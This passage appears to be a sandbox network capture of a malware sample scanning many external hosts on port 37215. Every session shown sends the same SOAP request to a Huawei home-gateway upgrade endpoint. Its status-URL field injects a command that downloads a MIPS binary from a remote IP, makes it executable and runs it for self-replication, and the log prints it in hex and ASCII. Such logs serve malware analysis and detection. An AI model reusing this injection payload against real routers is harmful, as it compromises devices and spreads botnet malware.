2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  670192.168.2.135269841.216.157.4037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.303388119 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  671192.168.2.1344174189.240.107.6837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.303410053 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  672192.168.2.1337212197.117.30.20437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.303421974 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  673192.168.2.135971892.69.135.18837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.303423882 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  674192.168.2.1346662157.166.93.23937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.303437948 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  675192.168.2.1348958197.238.15.12637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.303864956 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  676192.168.2.1339708157.131.141.2837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.308470964 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  677192.168.2.135876641.90.240.17937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.308506966 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  678192.168.2.135306441.182.7.19637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.308541059 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  679192.168.2.134177241.13.155.1837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.308557987 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  680192.168.2.1350114157.17.228.8437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.308562040 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
